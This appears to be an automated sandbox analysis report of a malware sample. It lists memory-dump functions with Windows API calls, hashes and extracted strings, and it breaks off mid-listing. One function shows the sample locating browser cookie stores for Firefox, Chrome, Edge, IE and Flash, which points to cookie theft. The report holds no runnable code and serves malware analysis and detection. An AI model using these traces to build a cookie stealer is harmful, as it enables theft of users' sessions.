Function 001FA07B, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,?,001F2292,?), ref: 001FA087

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 20cc4fb6dad8e513c6455dbf0c89c41f96b3fc13fa2a942aa06e12d8e36edf60
Instruction ID: 45d10495de6c6f70fda1239a7b9cb95ba852fadf628a325ca4c4fa95d80492c6
Opcode Fuzzy Hash: 20cc4fb6dad8e513c6455dbf0c89c41f96b3fc13fa2a942aa06e12d8e36edf60
Instruction Fuzzy Hash: 38B01235004100EBCA114B00EE04F25BB22B7A0704F104410B2400047086310461FB48

Uniqueness

Uniqueness Score: -1.00%

Function 001F550F, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 58c23245201ebbaf7a0df80b5ec7d8091e97683ab37da827a1a325a1e365e801
Instruction ID: 6d31433b51e14a4295055dbb4e7e11b8c6961a848f1631d18a1484fc1f5ef85c
Opcode Fuzzy Hash: 58c23245201ebbaf7a0df80b5ec7d8091e97683ab37da827a1a325a1e365e801
Instruction Fuzzy Hash: 68B01235404100FBDA014B10EE04F357B23B764700F008010F20000474C6310461FB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B3247D, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ce82ddb6e504933cac0c138a38d5e65e10c540d5e1736b6f5de63cfd82cebce3
Instruction ID: 73e1ce7f94107dd743dba99f1ee241a67dcd9ebbe9df769ac2b25505ac04c9a0
Opcode Fuzzy Hash: ce82ddb6e504933cac0c138a38d5e65e10c540d5e1736b6f5de63cfd82cebce3
Instruction Fuzzy Hash: FEB01235000200ABCA014B20FE04F0D7B32B750700F304010B205420B08E314421EB05

Uniqueness

Uniqueness Score: -1.00%

Function 00B24FB0, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1bbb0cdda690055cade0ab18540037c00bafe00a28130307529a9807811010a7
Instruction ID: 25b573ee596922d7e5bb2f2c16bf89d68972cefe0b057742424e918b7aef27c4
Opcode Fuzzy Hash: 1bbb0cdda690055cade0ab18540037c00bafe00a28130307529a9807811010a7
Instruction Fuzzy Hash: DCB01231004200ABCA014B00EE04F0D7B22B750700F304410B205420B08F311420EB15

Uniqueness

Uniqueness Score: -1.00%

Function 001F28FD, Relevance: 1.3, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,001F2255,001F2255,?,?,?,?,?,?), ref: 001F2968

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a1d28d9d7aae594dae2579cec77b8bd7c7825a2630f88fb1e9fbe7f36bdf9e78
Instruction ID: fae553e7d138941128e24e48cac24bc528c2e5c2af40acb7e6ab24e1dbdf40c1
Opcode Fuzzy Hash: a1d28d9d7aae594dae2579cec77b8bd7c7825a2630f88fb1e9fbe7f36bdf9e78
Instruction Fuzzy Hash: 1D315C7290052DABCF11DF95C881AFEB7B9BF54358F204022FA15EB250D770EE818BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F3F83, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001F7DD8: memset.NTDLL ref: 001F7E3F
Part of subcall function 001F7DD8: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 001F7E7D
Part of subcall function 001F7DD8: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001F7E91
Part of subcall function 001F7DD8: CloseHandle.KERNEL32(?), ref: 001F7EA8
Part of subcall function 001F7DD8: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001F7EB4
Part of subcall function 001F7DD8: lstrcat.KERNEL32(?,?), ref: 001F7EF5
Part of subcall function 001F7DD8: FindFirstFileA.KERNELBASE(?,?), ref: 001F7F0B

Part of subcall function 001F8DEA: lstrlen.KERNEL32(?,?,?,?,001F2376,?), ref: 001F8DF3
Part of subcall function 001F8DEA: mbstowcs.NTDLL ref: 001F8E1A
Part of subcall function 001F8DEA: memset.NTDLL ref: 001F8E2C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,001F9865,?), ref: 001F3FD9

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: File$memset$CloseCreateFindFirstFreeHandleHeapTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 2663623528-0
Opcode ID: 66d0441ecc33ae7268bf695c7a98b66ce8840b417e16e04dbe41f9b2ea5467ea
Instruction ID: 81379ead8772c0f3085c034e053766be2bd01b0f89a889e248e4af61cf577f2c
Opcode Fuzzy Hash: 66d0441ecc33ae7268bf695c7a98b66ce8840b417e16e04dbe41f9b2ea5467ea
Instruction Fuzzy Hash: 21110436A0020CEBEB008B95DC44BFAB7B9EF50358F200062F705D7190C7759E82EB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B196D1, Relevance: 1.3, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

memset.NTDLL ref: 00B196EF

Part of subcall function 00B2E3A4: memset.NTDLL ref: 00B2E3CA
Part of subcall function 00B2E3A4: memcpy.NTDLL ref: 00B2E3F2
Part of subcall function 00B2E3A4: GetLastError.KERNEL32(00000010,00000218,00B36DDD,00000100,?,00000318,00000008), ref: 00B2E409
Part of subcall function 00B2E3A4: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00B36DDD,00000100), ref: 00B2E4EC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset$AllocateHeapmemcpy
String ID:
API String ID: 4290293647-0
Opcode ID: f3f1b88a2da6ec419a17cb50d078015069840ad6664a7b061fa096888e1b8dbf
Instruction ID: 61ab6212ba5f927ae0cf7de40469c231103a7e83316b3715788fc16ad87d710e
Opcode Fuzzy Hash: f3f1b88a2da6ec419a17cb50d078015069840ad6664a7b061fa096888e1b8dbf
Instruction Fuzzy Hash: 4F014430511358ABC3219F29EC81F9B7BE8EF48750F10806AFC4887382C3B0DD808BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001F8393, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001F7A7D: RegCloseKey.ADVAPI32(80000002,?,001F8849,3D001FC0,80000002,001F262A,00000000,001F262A,?,?,80000002,00000000,?), ref: 001F7B14

HeapFree.KERNEL32(00000000,?,00000000,80000002,001FC068,?,?,001FC068,00000000,?,001F4B5F,?,?,003FBFB0,00000000,?), ref: 001F83DE

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: f5b71bdfd54c79f3ddc3b15672e08b0981469ac7e9f7b6df5eb06216f233485c
Instruction ID: 8fc019e963573687bfd54118913080aafd3e9f80bc9cc0cb5d76f706dfe79f3e
Opcode Fuzzy Hash: f5b71bdfd54c79f3ddc3b15672e08b0981469ac7e9f7b6df5eb06216f233485c
Instruction Fuzzy Hash: 6001FB3610028DEBCB168F54CC05FBA3B66FB94750F158429FB594A160DB71D921DB54

Uniqueness

Uniqueness Score: -1.00%

Function 001F98B3, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 001F98FB

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fb7f158f44b2472a5471913c21e673a308251ca095e3f9cd99f7c00a4464d891
Instruction ID: 42368e3aa4921e698bf1372a5fabe044d39f99d807871f93a312acb226d69b5d
Opcode Fuzzy Hash: fb7f158f44b2472a5471913c21e673a308251ca095e3f9cd99f7c00a4464d891
Instruction Fuzzy Hash: C1F03C75C0121CEFDB00EB94C488AFEB7B8FF05348F1180AAE61663100D7B45B80DB51

Uniqueness

Uniqueness Score: -1.00%

Function 001F63AB, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(001F262A,?,?,001F8936,3D001FC0,80000002,001F262A,001F2829,?,?,001F2829,?,3D001FC0,80000002,001F262A,?), ref: 001F63CB

Part of subcall function 001F2156: SysAllocString.OLEAUT32(?), ref: 001F2170
Part of subcall function 001F2156: SysFreeString.OLEAUT32(00000000), ref: 001F21B0

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 4ed605e1f06edf8aa2a4e356021a96cb7339a07069e0443c642b8493ade3f0c3
Instruction ID: f2949fe8332233cc15ca1eb2a9a6bde7a5f9f96a5c653ef1a3ac240f88803f6c
Opcode Fuzzy Hash: 4ed605e1f06edf8aa2a4e356021a96cb7339a07069e0443c642b8493ade3f0c3
Instruction Fuzzy Hash: 58E0AE3200410EFFCF069F90EC06EAA3B6AFB18350F148015FA1854062CB72D5B5ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 001F93F5, Relevance: 1.3, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

Part of subcall function 001F21C3: memset.NTDLL ref: 001F226E
Part of subcall function 001F21C3: memset.NTDLL ref: 001F2282

memcpy.NTDLL(00000002,00000002,00000000,?,?,001F783E,?,?,00000002,?), ref: 001F9411

Part of subcall function 001FA07B: RtlFreeHeap.NTDLL(00000000,?,001F2292,?), ref: 001FA087

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: memset$FreeHeapmemcpy
String ID:
API String ID: 2248996368-0
Opcode ID: 8c4b64c041c37b71a09cbdb423d988617b459d553229c9f33fd3395abe6d31b6
Instruction ID: 1c7a2ba3799eee992f80b174daeae1598a9d74e7dd3b022ff9e78f3e124fa7a8
Opcode Fuzzy Hash: 8c4b64c041c37b71a09cbdb423d988617b459d553229c9f33fd3395abe6d31b6
Instruction Fuzzy Hash: A9E08C7640552C76CB122A94EC01EFB7F5CDF667D0F004024FF088A201E736CA1097E2

Uniqueness

Uniqueness Score: -1.00%

Function 00B24F76, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B24F80

Part of subcall function 00B2E866: RegOpenKeyExA.KERNELBASE(00B24F98,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,00B3E130,00B24F98,00B215E7,80000001,?,00B215E7), ref: 00B2E89F
Part of subcall function 00B2E866: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,00B215E7), ref: 00B2E8B3
Part of subcall function 00B2E866: RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,00B215E7), ref: 00B2E8FC

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: e0687e6f58cfad2a21941a97c3c994ebabc033b97c44297dbb8b3ae019ffb63b
Instruction ID: 78a6ab577b1fe7bd626ebd7128da9b279fbc935533666e2c7e2e8980b527b280
Opcode Fuzzy Hash: e0687e6f58cfad2a21941a97c3c994ebabc033b97c44297dbb8b3ae019ffb63b
Instruction Fuzzy Hash: C9E0E230140118B6DB206F56EC02F893B95AF14790F408060BE1C6D162D772DAA5A684

Uniqueness

Uniqueness Score: -1.00%

Function 00B149D6, Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,00B3A5A8,0000002C,00B29AAA,NTDLL.DLL,6547775A,?,00B11224), ref: 00B149F0

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4a9bc2342ec2d8d95cd0de67cdce8e5924a7dad0b4f66079d116547c560f07e2
Instruction ID: c2c205369e801bb3a318af0c607dbc441e87557c0c1b1deede9b3832163b5b2b
Opcode Fuzzy Hash: 4a9bc2342ec2d8d95cd0de67cdce8e5924a7dad0b4f66079d116547c560f07e2
Instruction Fuzzy Hash: FCD0E236D006199BCB209BA4D846A9EFBB0BB08750F608264E960731A0CA3019168B90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B15ECA, Relevance: 58.0, APIs: 16, Strings: 17, Instructions: 226memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(%APPDATA%,00B36CE0,00000000,?,00000000,00B123FE), ref: 00B15EE2

Part of subcall function 00B2888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00B288D9
Part of subcall function 00B2888D: lstrlenW.KERNEL32(?,?,00000000), ref: 00B288E5
Part of subcall function 00B2888D: memset.NTDLL ref: 00B2892D
Part of subcall function 00B2888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B28948
Part of subcall function 00B2888D: lstrlenW.KERNEL32(0000002C), ref: 00B28980
Part of subcall function 00B2888D: lstrlenW.KERNEL32(?), ref: 00B28988
Part of subcall function 00B2888D: memset.NTDLL ref: 00B289AB
Part of subcall function 00B2888D: wcscpy.NTDLL ref: 00B289BD

Part of subcall function 00B2888D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B289E3
Part of subcall function 00B2888D: RtlEnterCriticalSection.NTDLL(?), ref: 00B28A18
Part of subcall function 00B2888D: RtlLeaveCriticalSection.NTDLL(?), ref: 00B28A34
Part of subcall function 00B2888D: FindNextFileW.KERNEL32(?,00000000), ref: 00B28A4D
Part of subcall function 00B2888D: WaitForSingleObject.KERNEL32(00000000), ref: 00B28A5F
Part of subcall function 00B2888D: FindClose.KERNEL32(?), ref: 00B28A74
Part of subcall function 00B2888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B28A88
Part of subcall function 00B2888D: lstrlenW.KERNEL32(0000002C), ref: 00B28AAA

RtlAllocateHeap.NTDLL(00000000,00000036,%APPDATA%\Mozilla\Firefox\Profiles), ref: 00B15F29
memcpy.NTDLL(00000000,%APPDATA%,00000000,?,00000000,00B123FE), ref: 00B15F3E
lstrcpyW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 00B15F4E

Part of subcall function 00B2888D: FindNextFileW.KERNEL32(?,00000000), ref: 00B28B20
Part of subcall function 00B2888D: WaitForSingleObject.KERNEL32(00000000), ref: 00B28B32
Part of subcall function 00B2888D: FindClose.KERNEL32(?), ref: 00B28B4D

HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010,?,?,00000000,00B123FE), ref: 00B15F72
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 00B15F8A
HeapFree.KERNEL32(00000000,00000000,?,00000000,00B123FE), ref: 00B15FD6
lstrlenW.KERNEL32(00000000,%userprofile%\AppData\Local\,?,00000000,00B123FE), ref: 00B15FF5
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B16007
HeapFree.KERNEL32(00000000,00000000,00000000,cookies,?,00000000,00000000,00000014,?,00000000,00B123FE), ref: 00B1605E
HeapFree.KERNEL32(00000000,00000000,?,00000000,00B123FE), ref: 00B16070
CreateDirectoryW.KERNEL32(00000000,00000000,%userprofile%\AppData\Local\,?,00000000,00B123FE), ref: 00B16097
lstrlenW.KERNEL32(\cookie.ie,%userprofile%\AppData\Local\,?,00000000,00B123FE), ref: 00B160DD
DeleteFileW.KERNEL32(?,%userprofile%\AppData\Local\,?,00000000,00B123FE), ref: 00B16106
HeapFree.KERNEL32(00000000,?,?,00000000,00B123FE), ref: 00B16114
HeapFree.KERNEL32(00000000,?,?,00000000,00B123FE), ref: 00B16137

Strings

\cookie.ie, xrefs: 00B160D7
\cookie.ff, xrefs: 00B160D0, 00B160DC
Google\Chrome\User Data\Default, xrefs: 00B1600F
cookies.sqlite-journal, xrefs: 00B15F10
*.txt, xrefs: 00B15FAB
*.cookie, xrefs: 00B15FC1
cookies.sqlite, xrefs: 00B15EF5
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 00B15EFA, 00B15EFF, 00B15F15
cookies, xrefs: 00B16027, 00B16049
*.sol, xrefs: 00B15F5D
%APPDATA%, xrefs: 00B15ED5, 00B15F38
\sols, xrefs: 00B160E5
%userprofile%\AppData\Local\, xrefs: 00B15FDC
\Macromedia\Flash Player\, xrefs: 00B15F46
\cookie.ed, xrefs: 00B160C2
\cookie.cr, xrefs: 00B160C9
Microsoft\Edge\User Data\Default, xrefs: 00B16032

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$lstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymemcpywcscpy
String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$%userprofile%\AppData\Local\$*.cookie$*.sol$*.txt$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$\Macromedia\Flash Player\$\cookie.cr$\cookie.ed$\cookie.ff$\cookie.ie$\sols$cookies$cookies.sqlite$cookies.sqlite-journal
API String ID: 659829602-1887243743
Opcode ID: 51342f53cdce17a96a833a2231ce706df0322f3d9538dd6dbc2f97435a61ed16
Instruction ID: e8a3d9649566185f78cc9b2e5c50ddcfc055ff34224f66aa5b53c5916ae049ea
Opcode Fuzzy Hash: 51342f53cdce17a96a833a2231ce706df0322f3d9538dd6dbc2f97435a61ed16
Instruction Fuzzy Hash: 6B61EF71544319BFC320AF64AC88DAF7BECEB89B04F6009B9F506E3162EE609D45C761

Uniqueness

Uniqueness Score: -1.00%

Function 00B1E0BA, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 224memoryfiletimeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,.dll), ref: 00B1E0E8
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00B1E10B
memset.NTDLL ref: 00B1E126

Part of subcall function 00B23996: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00B1E13F,73797325), ref: 00B239A7
Part of subcall function 00B23996: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00B239C1

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00B1E167
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00B1E17D
CloseHandle.KERNEL32(?), ref: 00B1E197
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00B1E1A4
lstrcat.KERNEL32(?,642E2A5C), ref: 00B1E1E9
FindFirstFileA.KERNEL32(?,?), ref: 00B1E1FE
CompareFileTime.KERNEL32(?,?), ref: 00B1E21C
FindNextFileA.KERNEL32(?,?), ref: 00B1E22F
FindClose.KERNEL32(?), ref: 00B1E23D
FindFirstFileA.KERNEL32(?,?), ref: 00B1E248
CompareFileTime.KERNEL32(?,?), ref: 00B1E268
StrChrA.SHLWAPI(?,0000002E), ref: 00B1E2A0
memcpy.NTDLL(?,?,00000000), ref: 00B1E2D6
FindNextFileA.KERNEL32(?,?), ref: 00B1E2EB
FindClose.KERNEL32(?), ref: 00B1E2F9
FindFirstFileA.KERNEL32(?,?), ref: 00B1E304
CompareFileTime.KERNEL32(?,?), ref: 00B1E314
FindClose.KERNEL32(?), ref: 00B1E34D
HeapFree.KERNEL32(00000000,?,73797325), ref: 00B1E360
HeapFree.KERNEL32(00000000,?), ref: 00B1E371

Strings

.dll, xrefs: 00B1E0D3

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: .dll
API String ID: 455834338-2738580789
Opcode ID: ece6a15eb8b0bb52f2d7d494a0aa4b85f51d4d3f560f34af0961b2f4190a871a
Instruction ID: 9c669821d75ed916401ba678ac95c59e0a01fd92107696571c7c32e3ad08d141
Opcode Fuzzy Hash: ece6a15eb8b0bb52f2d7d494a0aa4b85f51d4d3f560f34af0961b2f4190a871a
Instruction Fuzzy Hash: 49812572508301AFD711DF25DC84AAFBBE9FB88740F54096AF9A5D31A0DB70D948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B2888D, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 233stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

Part of subcall function 00B19689: ExpandEnvironmentStringsW.KERNEL32(00B31384,00000000,00000000,00000001,00000000,00000000,?,00B31384,00000000), ref: 00B196A0
Part of subcall function 00B19689: ExpandEnvironmentStringsW.KERNEL32(00B31384,00000000,00000000,00000000), ref: 00B196BA

lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00B288D9
lstrlenW.KERNEL32(?,?,00000000), ref: 00B288E5
memset.NTDLL ref: 00B2892D
FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B28948
lstrlenW.KERNEL32(0000002C), ref: 00B28980
lstrlenW.KERNEL32(?), ref: 00B28988
memset.NTDLL ref: 00B289AB
wcscpy.NTDLL ref: 00B289BD
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B289E3
RtlEnterCriticalSection.NTDLL(?), ref: 00B28A18

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

RtlLeaveCriticalSection.NTDLL(?), ref: 00B28A34
FindNextFileW.KERNEL32(?,00000000), ref: 00B28A4D
WaitForSingleObject.KERNEL32(00000000), ref: 00B28A5F
FindClose.KERNEL32(?), ref: 00B28A74
FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B28A88
lstrlenW.KERNEL32(0000002C), ref: 00B28AAA
FindNextFileW.KERNEL32(?,00000000), ref: 00B28B20
WaitForSingleObject.KERNEL32(00000000), ref: 00B28B32
FindClose.KERNEL32(?), ref: 00B28B4D

Strings

%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 00B288CD

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID: %APPDATA%\Mozilla\Firefox\Profiles
API String ID: 2962561936-3215297822
Opcode ID: 8f3d103f7fcd1d4c6f6a6e340e423fa791981957d3c754700f8c46707fdf72c3
Instruction ID: 82a1eab83b9f96e8c86abec9e3be2385681ee74105d4a5a45151761285609682
Opcode Fuzzy Hash: 8f3d103f7fcd1d4c6f6a6e340e423fa791981957d3c754700f8c46707fdf72c3
Instruction Fuzzy Hash: 94819AB1504315AFC711AF28EC85A2BBBE9FF88300F1448ADF59997262DF74E844CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B162FA, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 361memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B16330
StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B16362
StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B16394
StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B163C6
StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B163F8
StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B1642A
StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B1645C
StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B1648E
StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B164C0
HeapFree.KERNEL32(00000000,?,Scr,?,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?), ref: 00B16523

Part of subcall function 00B284CA: RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B284D3
Part of subcall function 00B284CA: HeapFree.KERNEL32(00000000,?,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B28505
Part of subcall function 00B284CA: RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B28523

StrToIntExA.SHLWAPI(00000000,00000000,?,73BCF710,00000000,00000000,?,?,00B358C6,?,?,?,?,?,00B120D2,?), ref: 00B1654E

Strings

Scr, xrefs: 00B16502

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID: Scr
API String ID: 1298188129-1633706383
Opcode ID: daeac27e5cd116e3b0c41d52c7c3e3ad3ce88eedf0550d509c98496fcf8b97b1
Instruction ID: b565c138dd9b5fd03ef2e10ad06aee1e5881f80f919e7a99bedbe626d5b2b64c
Opcode Fuzzy Hash: daeac27e5cd116e3b0c41d52c7c3e3ad3ce88eedf0550d509c98496fcf8b97b1
Instruction Fuzzy Hash: DBB1D461700225AB8724EB79ECC5EEF27DDDF187407A44CA5B80ACB245EE70DD808BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B205EF, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 00B2061C
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00B20628
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B20639
memset.NTDLL ref: 00B20656
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 00B20664
WaitForSingleObject.KERNEL32(00000000), ref: 00B20672
GetDriveTypeW.KERNEL32(?), ref: 00B20680
lstrlenW.KERNEL32(?), ref: 00B2068C
wcscpy.NTDLL ref: 00B2069F
lstrlenW.KERNEL32(?), ref: 00B206B9
HeapFree.KERNEL32(00000000,?), ref: 00B206D2

Strings

\\?\, xrefs: 00B20613

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID: \\?\
API String ID: 3888849384-4282027825
Opcode ID: 578970fcf9222d384146d8e2a77792a4d3b01a3475743680c9fd4be24cbfd789
Instruction ID: 000234d280068842f600dea1d052893c2616d1acb863350dd320bc7c3fe3770a
Opcode Fuzzy Hash: 578970fcf9222d384146d8e2a77792a4d3b01a3475743680c9fd4be24cbfd789
Instruction Fuzzy Hash: FF314C32801218BFCB11ABA5ED89CDEBFB9FF49364B604455F108F3061DB30AA55DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B15BD5, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69libraryloaderCOMMON

